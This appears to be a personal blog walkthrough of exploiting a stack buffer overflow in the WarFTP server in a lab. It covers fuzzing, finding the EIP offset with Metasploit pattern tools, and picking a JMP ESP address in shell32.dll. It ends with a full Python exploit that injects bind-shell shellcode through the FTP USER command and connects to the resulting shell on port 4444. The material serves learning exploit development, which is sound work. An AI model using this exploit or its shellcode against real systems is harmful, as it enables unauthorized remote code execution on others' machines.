1. Tools
- Ollydbg as debugger
- Fuzzer for fuzzing process
- Python, for make fuzzer an application and exploit
2. install and running WarFtp application. then make it online (properties --> start service, so the status become idle)
3. i will try to connect the ftp use netcut and use port 21
root@bt:~# nc 192.168.56.101 21
4. Fuzzing. i will make the fuzzer use python language. i will write the script in editor kwrite save it use name warftpfuzzer.py
6. run the warftpfuzzer.py
root@bt:~# python warftpfuzzer.py
if the warftpfuzzer.py success, the application will be crash
7. Debugger.
use ollydbgapplication to debugging warftp.
root@bt:~# python warftpfuzzer.py
if success, we will look like this :
the register ESP, EDI, EBP, EIP will overwrite become AAAAA or 414141 (A in hexa is 41)
8. use metasploit framework to create the pattern
root@bt:/pentest/exploits/framework/tools# ./pattern_create.rb 1000 > string_pattern.txt
then open the string_pattern.txt to use the pattern string (we will see 1000 character from "Aa0" until "Bh2B").
open the warftpfuzzer.py to edit it. (copy the character of string_pattern.txt to variabel buffer )
then, run the warftpfuzzer.py again to make the application crash again and see the register.
use the pattern_offset to calculate how many byte data from begining of the pattern until the end of pattern string.
root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb 32714131 --> from register EIP
the result is 485
root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb q4Aq5Aq --> from register ESP
the result is 493
from here, we know that register EIP will overwrite by 4 bytes that is 486, 487, 488, 489.
9. now i will try to write on the ESP register, because the ESP is temporary data storage in memory (stack) to allow the payload placed into the stack.
edit the warftpfuzzer.py and run it again to see the crash
10. JMP ESP. usie ESP register to direct access into buffer memory as intermediary, because the EIP register cannot direct access into stack (buffer memory).
JMP command is serves to move commands from one register into another register.
JMP ESP is a command that used by application to read data in the buffer.
Register EIP --> memory address, there are command JMP ESP --> Register ESP --> Buffer (stack) --> exploit PAYLOADS.
11. then, try to find the JMP ESP in memory application.
open Ollydbg on menu view --> Executeable modules. then double click on shell32.dll
and this is the result
then, change the offset address into little endian format, from 7C9D30D7 to be \xD7\x30\x9D\x7C.
after that, edit the warftpfuzzer.py and change the value of variable buffer+= "\xEF\xBE\xAD\xDE" to be buffer+= "\xD7\x30\x9D\x7C" like this
then run the warftp, ollydbg, and warftpfuzzer.py again
12. open metasploit for create the Payload
root@bt:/pentest/exploits/framework2# ./msfweb
then, open browser and fill the address http://127.0.0.1:55555/ and chosee payloads
after that choose windows bind shell and set like this.
after that, generate it and i got the result like this.
13. copy the results and paste on script fuzzer like this
#!/usr/bin/python
import socket
s=socket.socket (socket.AF_INET,socket.SOCK_STREAM)
#buffer="\x41"*1000
buffer= "\x90"*485
buffer+= "\xD7\x30\x9D\x7C"
#buffer+="\x90"*(493-len(buffer))
#buffer+="\xCC"*(1000-len(buffer))
buffer+= "\x90"*32
buffer+="\xbe\x34\xdf\x34\x30\xdb\xd0\x29\xc9\xb1\x51\xd9\x74\x24\xf4\x58"
buffer+="\x31\x70\x12\x03\x70\x12\x83\xdc\x23\xd6\xc5\xe0\xb6\xfc\x6b\xf0"
buffer+="\xbe\xfc\x8b\xff\x21\x88\x18\xdb\x85\x05\xa5\x1f\x4d\x65\x23\x27"
buffer+="\x50\x79\xa0\x98\x4a\x0e\xe8\x06\x6a\xfb\x5e\xcd\x58\x70\x61\x3f"
buffer+="\x91\x46\xfb\x13\x56\x86\x88\x6c\x96\xcd\x7c\x73\xda\x39\x8a\x48"
buffer+="\x8e\x99\x5b\xdb\xcb\x69\xc4\x07\x15\x85\x9d\xcc\x19\x12\xe9\x8d"
buffer+="\x3d\xa5\x06\x32\x12\x2e\x51\x58\x4e\x2c\x03\x63\xbf\x97\xa7\xe8"
buffer+="\x83\x17\xa3\xae\x0f\xd3\xc3\x32\xbd\x68\x63\x42\xe3\x06\xea\x1c"
buffer+="\x15\x3b\xa2\x5f\xff\xa5\x10\xf9\x68\x19\xa5\x6d\x1e\x2e\xfb\x32"
buffer+="\xb4\x2f\x2b\xa4\xff\x3d\x30\x0f\x50\x41\x1f\x30\xd9\x58\xc6\x4f"
buffer+="\x34\xaa\x05\x1a\xad\xa9\xf6\x74\x59\x77\x01\x81\x37\xd0\xed\xbf"
buffer+="\x1b\x8c\x42\x6c\xcf\x71\x36\xd1\xbc\x8a\x68\xb3\x2a\x64\xd5\x5d"
buffer+="\xf8\x0f\x04\x34\x96\xab\xdd\x46\xa0\xe3\x1e\x70\x44\x1c\xb0\x29"
buffer+="\x66\xcc\x5a\x75\x35\xc3\x73\x22\xb9\xca\xd7\x99\xba\x23\xbf\xc4"
buffer+="\x0c\x42\x09\x51\x70\x9c\xda\x09\xda\x74\x24\x61\x71\x1e\x3d\xf8"
buffer+="\xb0\xa6\x96\x05\xea\x0c\xe6\x29\x75\xc5\x7c\xaf\x12\x7a\x10\xa6"
buffer+="\x06\x16\xba\xe1\xe1\x2b\xb3\xf6\x98\xf7\x4d\x1a\x6d\x38\xbe\x70"
buffer+="\x70\xfa\x6c\x7a\xcf\xd7\xfd\x0f\xaa\x1f\xa9\xa4\xe0\x08\xdf\x44"
buffer+="\x45\xde\xe0\xcd\xee\x20\xc8\x76\xb8\x8c\xa4\xd9\x17\x5b\x46\x88"
buffer+="\xc6\xce\x19\xd5\x39\x98\x34\xf0\xbf\x97\x14\xfd\x16\x4d\x64\xfe"
buffer+="\xa0\x6d\x4a\x8b\x98\x6d\xe8\x4f\x42\x71\x39\x1d\x74\x5d\xae\xdf"
buffer+="\x52\xbc\x5c\x4c\x9c\x97\x5c\xa2"
s.connect (('192.168.56.101', 21))
data=s.recv (1024)
print("sending ... ")
s.send('USER '+buffer+ '\r\n')
data=s.recv (1024)
s.send('PASS PASSWORD '+ '\r\n')
s.close()
print("Finish")
14. run the warftp and warftpfuzzer.py again without ollydbg for make sure that the warftp will be crash like this
root@bt:~# telnet 192.168.56.101 4444
well.... my exploit is success....
and Don't forget to say thank's our my God .... :D
No comments:
Post a Comment